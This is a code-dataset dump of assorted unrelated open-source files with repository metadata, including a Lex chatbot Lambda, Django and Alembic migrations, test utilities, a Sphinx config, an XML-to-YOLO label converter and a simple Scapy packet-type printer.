'StringValue': location
},
'peoplenum': {
'DataType': 'String',
'StringValue': peopleNum
},
'date': {
'DataType': 'String',
'StringValue': date
},
'time': {
'DataType': 'String',
'StringValue': time_open
}
},
MessageBody=(
sqsmessage
)
)
logger.debug(sqsmessage)
return close(
session_attributes,
'Fulfilled',
'I have sent my suggestions to the following phone number: \n' + phone
)
def greeting(intent_request):
response = {
'dialogAction': {
"type": "ElicitIntent",
'message': {
'contentType': 'PlainText',
'content': 'Yo, how can I help?'}
}
}
return response
def thankyou(intent_request):
response = {
'dialogAction': {
"type": "ElicitIntent",
'message': {
'contentType': 'PlainText',
'content': 'You\'re welcome!'}
}
}
return response
def dispatch(intent_request):
logger.debug(
'dispatch userId={}, intentName={}'.format(intent_request['userId'], intent_request['currentIntent']['name']))
intent_name = intent_request['currentIntent']['name']
# Dispatch to your bot's intent handlers
if intent_name == 'GreetingIntent':
return greeting(intent_request)
elif intent_name == 'ThankYouIntent':
return thankyou(intent_request)
elif intent_name == 'DiningSuggestionsIntent':
return diningSuggestions(intent_request)
raise Exception('Intent with name ' + intent_name + ' not supported')
def lambda_handler(event, context):
os.environ['TZ'] = 'America/New_York'
time.tzset()
logger.debug('event.bot.name={}'.format(event['bot']['name']))
return dispatch(event)
|
[
"woodenrubberzhang@gmail.com"
] |
woodenrubberzhang@gmail.com
|
38e66487b8f3e6080d36fa5c19b8a95bc793311f
|
0e9f73d2ef1239b22e049ef6338362da7dbfb122
|
/source/web/Django/FatQuantsDjango/FatQuantsDjango/ticker/migrations/0065_auto_20190209_2232.py
|
da99dbc20030cad9a96f28f1f13228b4442183bd
|
[] |
no_license
|
Andy-Mason/FatQuants
|
3c4bfafc29834af76b0be40e93b0e210e0ef5056
|
edd0e98f4599ef91adbdf4179164769ddd66c62a
|
refs/heads/master
| 2023-01-11T10:57:50.563742
| 2021-08-11T19:04:59
| 2021-08-11T19:04:59
| 73,127,295
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 661
|
py
|
# Generated by Django 2.1.3 on 2019-02-09 22:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ticker', '0064_auto_20190209_2231'),
]
operations = [
migrations.AddField(
model_name='tickereoddata',
name='close_value',
field=models.FloatField(blank=True, db_column='close_value', null=True, verbose_name='Close'),
),
migrations.AddField(
model_name='tickereoddata',
name='volume',
field=models.FloatField(blank=True, db_column='volume', null=True, verbose_name='Volume'),
),
]
|
[
"Andy-Mason@users.noreply.github.com"
] |
Andy-Mason@users.noreply.github.com
|
1f51647eba384115a71102ac36198438a8261671
|
55b78bafd8a396907ec669236206d1ea74a36610
|
/manage.py
|
b44e526b9dca86c886ab3a6c199470a05d761f59
|
[] |
no_license
|
LorroWijn/eHealth
|
8dd6d171e6c4ab085c3d372f3ef404577de66afb
|
b963a3b92d774ca1e8cd63d7ec3736d4579ebbac
|
refs/heads/master
| 2023-02-11T01:54:46.658539
| 2021-01-12T10:46:09
| 2021-01-12T10:46:09
| 301,711,008
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 663
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'eHealth.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"33690232+LorroWijn@users.noreply.github.com"
] |
33690232+LorroWijn@users.noreply.github.com
|
9b065ad3bc64f06b7fcaff92d27fb2ee90ecfe6e
|
fc58366ed416de97380df7040453c9990deb7faa
|
/tools/dockerize/webportal/usr/lib/python2.7/site-packages/oslo_db/tests/old_import_api/utils.py
|
44eb1aeb24eb802ae554e3fcfda13866332912a7
|
[
"Apache-2.0"
] |
permissive
|
foruy/openflow-multiopenstack
|
eb51e37b2892074234ebdd5b501b24aa1f72fb86
|
74140b041ac25ed83898ff3998e8dcbed35572bb
|
refs/heads/master
| 2016-09-13T08:24:09.713883
| 2016-05-19T01:16:58
| 2016-05-19T01:16:58
| 58,977,485
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,310
|
py
|
# Copyright 2010-2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
from oslo.config import cfg
from oslotest import base as test_base
from oslotest import moxstubout
import six
if six.PY3:
@contextlib.contextmanager
def nested(*contexts):
with contextlib.ExitStack() as stack:
yield [stack.enter_context(c) for c in contexts]
else:
nested = contextlib.nested
class BaseTestCase(test_base.BaseTestCase):
def setUp(self, conf=cfg.CONF):
super(BaseTestCase, self).setUp()
moxfixture = self.useFixture(moxstubout.MoxStubout())
self.mox = moxfixture.mox
self.stubs = moxfixture.stubs
self.conf = conf
self.addCleanup(self.conf.reset)
|
[
"wenxiang.wang1204@gmail.com"
] |
wenxiang.wang1204@gmail.com
|
3da690d33b022de40070de3907852084abdc8e90
|
6badd56b2360979c1c4a22cfe719de9c6d5d56d7
|
/Flask/migrations/versions/8aaa54384776_.py
|
27e8343759c655f46575b7f6ad673423ef8c60f8
|
[] |
no_license
|
ferrufino/t247
|
e78afff820816a2db39fbba95d2da94ce635e4ef
|
6247983295c448c987bef5eff40be99c61e43bcf
|
refs/heads/master
| 2021-09-03T15:15:23.945909
| 2016-12-26T23:06:37
| 2016-12-26T23:06:37
| 23,481,514
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 627
|
py
|
"""empty message
Revision ID: 8aaa54384776
Revises: 839b2982db1f
Create Date: 2016-11-29 18:06:51.782267
"""
# revision identifiers, used by Alembic.
revision = '8aaa54384776'
down_revision = '839b2982db1f'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('submission', sa.Column('no_of_attempt', sa.Integer(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('submission', 'no_of_attempt')
### end Alembic commands ###
|
[
"msf1013@gmail.com"
] |
msf1013@gmail.com
|
503cdbd13ac9e95d89d2847aabb527de1c810769
|
369b7f114f9bd9b45dd5fef77a070cb73abb68d1
|
/handle/itl/h20180123/insertFundInvestLog.py
|
0754801c39b9a7088aaa3f77d47ee88123974bf7
|
[] |
no_license
|
lyjloveabc/thor_handle
|
d790ee25317f724825c94a6b346a034ec0ae6e3d
|
8b9eda97ec873f3bf1732a428898a04d6a55c0af
|
refs/heads/master
| 2021-12-27T10:15:16.668264
| 2021-08-16T13:45:34
| 2021-08-16T13:45:34
| 84,824,162
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 571
|
py
|
import json
import requests
class InsertFundInvestLog:
def __init__(self):
# self.ENV = 'http://127.0.0.1:7001'
self.ENV = 'http://127.0.0.1:7001'
self.ENV_PROD = 'http://121.43.166.200:7001'
def handle(self):
with open('fundInvestLog_20180301.json', 'r') as f:
data = json.load(f)
for row in data:
response = requests.post(self.ENV_PROD + '/fundInvestLog/fundInvestLog', data=row)
print(response.text)
if __name__ == '__main__':
ifil = InsertFundInvestLog()
ifil.handle()
|
[
"546223592@qq.com"
] |
546223592@qq.com
|
f44c79dba52af15a4c324b94646a2e32d5a6143e
|
ac5e52a3fc52dde58d208746cddabef2e378119e
|
/exps-gsn-edf/gsn-edf_ut=2.5_rd=0.65_rw=0.04_rn=4_u=0.075-0.35_p=harmonic-2/sched=RUN_trial=90/sched.py
|
73271d93d6d30c676753279395b2f3b6ba2f57c3
|
[] |
no_license
|
ricardobtxr/experiment-scripts
|
1e2abfcd94fb0ef5a56c5d7dffddfe814752eef1
|
7bcebff7ac2f2822423f211f1162cd017a18babb
|
refs/heads/master
| 2023-04-09T02:37:41.466794
| 2021-04-25T03:27:16
| 2021-04-25T03:27:16
| 358,926,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 259
|
py
|
-X FMLP -Q 0 -L 3 93 400
-X FMLP -Q 0 -L 3 80 400
-X FMLP -Q 1 -L 2 79 250
-X FMLP -Q 1 -L 2 57 175
-X FMLP -Q 2 -L 1 54 200
-X FMLP -Q 2 -L 1 39 400
-X FMLP -Q 3 -L 1 37 125
-X FMLP -Q 3 -L 1 33 200
29 150
18 150
16 150
11 125
11 125
|
[
"ricardo.btxr@gmail.com"
] |
ricardo.btxr@gmail.com
|
ecfcb71ce402310d3b32ca4dcfac0fb352addc47
|
d5c8ca88c643492b95ca57e972b76bcc56aac251
|
/tests/fr.py
|
04c4b5cd0876d96bfc25cd944cadcaa63294945c
|
[
"MIT"
] |
permissive
|
olopost/l18n
|
b8462e6cd5eed0293e9e18cde23c850bc8553514
|
c6ef71a94f32537d5c072b493b94d35ee06d9bf4
|
refs/heads/master
| 2020-03-19T16:14:17.737843
| 2018-06-09T09:12:34
| 2018-06-09T09:12:34
| 136,706,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 648
|
py
|
# -*- coding: utf-8 -*-
import l18n
from ._base import TestCase
from ._compat import unicode
class FrTests(TestCase):
language = 'fr'
def test_tz_city_translated(self):
self.assertEqual(
unicode(l18n.tz_cities['America/North_Dakota/New_Salem']),
u'New Salem (Dakota du Nord)'
)
def test_tz_fullname_translated(self):
self.assertEqual(
unicode(l18n.tz_fullnames['America/North_Dakota/New_Salem']),
u'Amérique/Dakota du Nord/New Salem'
)
def test_territory_translated(self):
self.assertEqual(unicode(l18n.territories['ES']), u'Espagne')
|
[
"samuel@meyn.fr"
] |
samuel@meyn.fr
|
c81a79a1e9e75fd4a88e801d5f26317e03ca49a3
|
e9c293194c317f4b4771074291e50a3f6545b279
|
/xmltxt.py
|
c8df80cec34f6cc7a927b9f3c09936d6a6fe325a
|
[] |
no_license
|
XLSAAA/yolov5
|
5928a3b1c2b08d1a56d6de8f0720d17dfee5b42f
|
ad6a745341167e1d96c79d86eb5557b5ae6e352e
|
refs/heads/main
| 2023-07-07T22:40:37.477448
| 2021-09-05T03:17:07
| 2021-09-05T03:17:07
| 403,201,570
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,371
|
py
|
import os
import xml.etree.ElementTree as ET
dirpath = 'F:/yhzkpoj/yolov5-master/imagetxt' # 原来存放xml文件的目录
newdir = 'F:/yhzkpoj/yolov5-master/fenglangjuxu' # 修改label后形成的txt目录
if not os.path.exists(newdir):
os.makedirs(newdir)
for fp in os.listdir(dirpath):
root = ET.parse(os.path.join(dirpath, fp)).getroot()
xmin, ymin, xmax, ymax = 0, 0, 0, 0
sz = root.find('size')
width = float(sz[0].text)
height = float(sz[1].text)
filename = root.find('filename').text
for child in root.findall('object'): # 找到图片中的所有框
sub = child.find('bndbox') # 找到框的标注值并进行读取
xmin = float(sub[0].text)
ymin = float(sub[1].text)
xmax = float(sub[2].text)
ymax = float(sub[3].text)
try: # 转换成yolov3的标签格式,需要归一化到(0-1)的范围内
x_center = (xmin + xmax) / (2 * width)
y_center = (ymin + ymax) / (2 * height)
w = (xmax - xmin) / width
h = (ymax - ymin) / height
except ZeroDivisionError:
print(filename, '的 width有问题')
with open(os.path.join(newdir, fp.split('.')[0] + '.txt'), 'a+') as f:
f.write(' '.join([str(2), str(x_center), str(y_center), str(w), str(h) + '\n']))
|
[
"noreply@github.com"
] |
noreply@github.com
|
2e512f27daf59d99f6040b185763a00b8e07ea3a
|
8a84375dac5e6b33215d20e12e0c197aeaa6e83d
|
/docs/conf.py
|
9ff817f5b2af6580eaed06b752ba69a80d83d411
|
[
"Apache-2.0"
] |
permissive
|
michaeljoseph/pymoji
|
5579af089cabf1784c656e7fddf9d20f9e6f5d6a
|
4bf26babc7b968d9a753907d4db5402cfd5c6d63
|
refs/heads/master
| 2021-01-01T18:12:37.805141
| 2013-12-09T10:42:24
| 2013-12-09T10:42:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,403
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# complexity documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
import sphinx_bootstrap_theme
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import pymoji
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'pymoji'
copyright = u', '
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = pymoji.__version__
# The full version, including alpha/beta/rc tags.
release = pymoji.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'pymojidoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'pymoji.tex', u'pymoji Documentation',
u'', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'pymoji', u'pymoji Documentation',
[u''], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'pymoji', u'pymoji Documentation',
u'', 'pymoji', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
html_theme = 'bootstrap'
html_theme_path = sphinx_bootstrap_theme.get_html_theme_path()
|
[
"michaeljoseph+github@gmail.com"
] |
michaeljoseph+github@gmail.com
|
92a00f87e97ffb33bc7cf6bcb4ca4102f87306bb
|
0d05a57a20f482c1435a6945a908cf28efbf15ba
|
/perceptrons/classical/tinyYolo/pyjawns/dailybatcher_1.py
|
a84adee72ed0587e901cdc57af714621d85b26e6
|
[] |
no_license
|
vinceparis95/zoo
|
67950d35585111bcd3f377f93f4de7b09dc45bb4
|
12d44327fc8bec5da2f5ea286dfeb24a5183194c
|
refs/heads/master
| 2020-09-10T22:03:39.231942
| 2019-11-21T02:05:54
| 2019-11-21T02:05:54
| 221,846,140
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,796
|
py
|
import pandas as pd
import numpy as np
import datetime
import glob
import re
'''
this program takes a daily batch of classifications for an environment,
and creates a matrix, containing 'id', 'age', and 'feature sum' columns.
These matrices are sent to output folders, one for each environment.
'''
# create 'file' column from yolo json
dataFrame = []
for image in glob.iglob('/Users/vinceparis/dev/dfyb/GrowLogs/ei/_images/out/*.json'):
file = re.findall(r'\d+', image)
dataFrame.append(file)
fileColumn = np.c_[dataFrame]
dataFrame = pd.DataFrame(fileColumn)
# create feature column from the sum of features
dataFrameB = pd.DataFrame()
dataFrameC = pd.DataFrame()
for image in glob.iglob('/Users/vinceparis/dev/dfyb/GrowLogs/ei/_images/out/*.json'):
df = pd.read_json(image)
dfFiltered = df.filter(items=['label', '0'])
dfFiltered = dfFiltered.replace('yellowing', -45.0)
dataFrameB = dataFrameB.append(dfFiltered)
dfSum = dfFiltered.sum(axis=0)
dataFrameC = dataFrameC.append(dfSum, ignore_index=True)
# dataFrameB.label[dataFrameB.label == 'yellowing'] = -100.0
# concatenate id and feature, sort by feature
dfF = pd.concat([dataFrame, dataFrameC], axis=1)
dfSorted = dfF.sort_values(by=['label'], ascending=False)
dfSorted = dfSorted.dropna()
dfSorted = dfSorted.rename(columns={0:'id'})
dfSorted = dfSorted.rename(columns={'label': 'featureSum'})
dfOutput = dfSorted.to_csv('/Users/vinceparis/dev/dfyb/utils/test.csv')
naturans = pd.read_csv('/Users/vinceparis/dev/dfyb/utils/test.csv')
# to the id and feature columns, we will add an 'age' column.
# first, create a 'planted time' column;
time = []
planted = pd.Timestamp('2019-04-16 00:06:33.346275')
col = dfSorted.__len__()
for x in range(0, col):
time.append(planted)
plantedColumn = np.c_[time]
plantedColumn = pd.DataFrame(plantedColumn)
output = naturans.join(plantedColumn)
output = output.rename(columns={0: "planted"})
output = output.filter(items=('id', 'featureSum', 'planted'))
# print(output)
# second, create 'current time' column.
time2 = []
for x in range (0, col):
time2.append(pd.Timestamp.now())
currentColumn = np.c_[time2]
output2 = pd.DataFrame(currentColumn)
output2 = output.join(output2)
output2 = output2.rename(columns={0: "current time"})
# print(output2)
# derive 'age' by subtracting 'planted time' from 'current time'
output2['age'] = output2['current time'] - output2['planted']
output2 = output2.filter(items=('id', 'age', 'featureSum'))
output2['age'] = output2['age'].astype(str).str[0:2]
output2['age'] = output2['age'].astype(float)
print(output2)
# send to environment folders (with a datetime)
now = datetime.datetime.now()
now = now.strftime("%m-%d")
output = output2.to_csv('/Users/vinceparis/dev/dfyb/GrowLogs/ei/eidailyData/e2gL'+str(now)+'.csv')
|
[
"vinceparis19@gmail.com"
] |
vinceparis19@gmail.com
|
13e2272bb18ea159a1d979995232168771b64045
|
3b930f60a7bea984c309f2a5572af2a586a6ca9a
|
/mango-python/bdgenomics/mango/utils.py
|
3c047972f51c6ab90e95a6ad5a0c0d2d26fafe11
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
shaneknapp/mango
|
00a2231c410a917747e66e8d520ae5c4a071d1ea
|
6eba24abd2387bd2c52ad319b34c8a82a904ec50
|
refs/heads/master
| 2020-06-10T03:48:46.360379
| 2019-06-24T19:16:01
| 2019-06-24T19:16:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 796
|
py
|
#
# Licensed to Big Data Genomics (BDG) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The BDG licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
CHR_PREFIX = 'chr'
|
[
"akmorrow@berkeley.edu"
] |
akmorrow@berkeley.edu
|
789f531277e300cc7635ee1540d92eaf1537f0b8
|
a962e861619672524f8601ec721bf22dee9af0e9
|
/webapp/views/views.py
|
18d3d258bdff686fa2bffcbeaa7dfa41c1db92d5
|
[] |
no_license
|
GELIFT/backend
|
679fdfd663c62153c0bf18ea1e450e12991e66e0
|
a39bf74d04dc4b2731da370860f0c49064b49868
|
refs/heads/master
| 2020-03-30T20:51:44.048039
| 2018-10-04T18:34:59
| 2018-10-04T18:34:59
| 151,607,239
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 710
|
py
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from webapp.models import Event, User
@login_required
def admin_dashboard(request):
events = Event.objects.all().order_by('-start_date')[:5]
users = User.objects.exclude(is_superuser=True).order_by('last_name')[:5]
return render(request, 'webapp/admin/admin_dashboard.html', {'events': events, 'users': users})
def index(request):
# Get active event
event = Event.objects.filter(is_active=True)
if event:
event = Event.objects.get(is_active=True)
return render(request, 'webapp/index.html', {'event': event})
else:
return render(request, 'webapp/index.html')
|
[
"g.a.f.derks@student.tue.nl"
] |
g.a.f.derks@student.tue.nl
|
ad8ca63c444d4bf8b98831272e3fa7df41cd671d
|
331635a7ffc237ebc34722d6eb2ae69e0b82c3a2
|
/20170818-threes-and-twos/threes-and-twos.py
|
b79b054b5eab3683bc35f973d3a6c7f9fcda2414
|
[] |
no_license
|
brmcdonnell/riddlers
|
22192dd07288be99f5fcd659d68be9a65a32f3f7
|
674cb31637ed88f29f37078de1945d367895a2ca
|
refs/heads/master
| 2022-04-20T08:36:00.402698
| 2020-03-28T20:44:54
| 2020-03-28T20:44:54
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
py
|
import numpy as np
import pandas as pd
sq = [3, 3, 3, 2]
ITER = int(1e4)
for i in range(1, ITER):
sq = sq + [3] * sq[i] + [2]
print('\nTable of 3s and 2s:')
print(pd.Series(sq).value_counts())
print('\nProportion of 3s and 2s:')
print(pd.Series(sq).value_counts() / len(sq))
|
[
"tim.book@summit.local"
] |
tim.book@summit.local
|
2433ea1d0965c169a7c6fd0e959543ad462f83d3
|
7dcb8b52d2c7bd223a86fa93e40c0153b0959206
|
/Scapy/scapy_sniff.py
|
6d99313a30ebd36be3fce903987e728c285c233e
|
[] |
no_license
|
gast04/CTF_ToolBox
|
2e36f81f083a1f4518a817e5fcaf8dfaa44e0b31
|
a1d74448a936e3b8ba1288edc099794776582fbd
|
refs/heads/master
| 2021-10-25T18:50:03.154094
| 2021-10-24T13:08:39
| 2021-10-24T13:08:39
| 94,090,071
| 15
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 295
|
py
|
from scapy.all import *
def pkt_callback(pkt):
if TCP in pkt:
print "TCP pkt"
elif UDP in pkt:
print "UDP pkt"
# call without filter to get all packets
sniff(iface="enp0s25", prn=pkt_callback, store=0)
#sniff(iface="enp0s25", prn=pkt_callback, filter="tcp", store=0)
|
[
"kurt.nistelberger@student.tugraz.at"
] |
kurt.nistelberger@student.tugraz.at
|
e20e7f340b0e719fa019c02d2a227a6589f4cc4f
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_baccalaureates.py
|
b6b3d264696b8bd5b102cbd3f2ddde23ad54b79c
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 287
|
py
|
from xai.brain.wordbase.nouns._baccalaureate import _BACCALAUREATE
#calss header
class _BACCALAUREATES(_BACCALAUREATE, ):
def __init__(self,):
_BACCALAUREATE.__init__(self)
self.name = "BACCALAUREATES"
self.specie = 'nouns'
self.basic = "baccalaureate"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
38986d4a704fb788926d73c8dcd2ed3bad07d847
|
45de3aa97525713e3a452c18dcabe61ac9cf0877
|
/src/primaires/objet/types/indefini.py
|
72fd243688f6d99b9e1d5c92bccd62e605901e8d
|
[
"BSD-3-Clause"
] |
permissive
|
stormi/tsunami
|
95a6da188eadea3620c70f7028f32806ee2ec0d1
|
bdc853229834b52b2ee8ed54a3161a1a3133d926
|
refs/heads/master
| 2020-12-26T04:27:13.578652
| 2015-11-17T21:32:38
| 2015-11-17T21:32:38
| 25,606,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,744
|
py
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type Indefini."""
from .base import BaseType
class Indefini(BaseType):
"""Type d'objet: indéfini.
"""
nom_type = "indéfini"
|
[
"kredh@free.fr"
] |
kredh@free.fr
|
82d72696650cdd9a2724152e1d3ba36d60cf2985
|
683289aa4b0c9788b0f3d11dcd8b6cabaefbf17f
|
/solid/2. open_close_principle/__init__.py
|
dc82f5e9024073acaeec7d2fac505c84d9bd85e4
|
[] |
no_license
|
Mort4lis/design-patterns
|
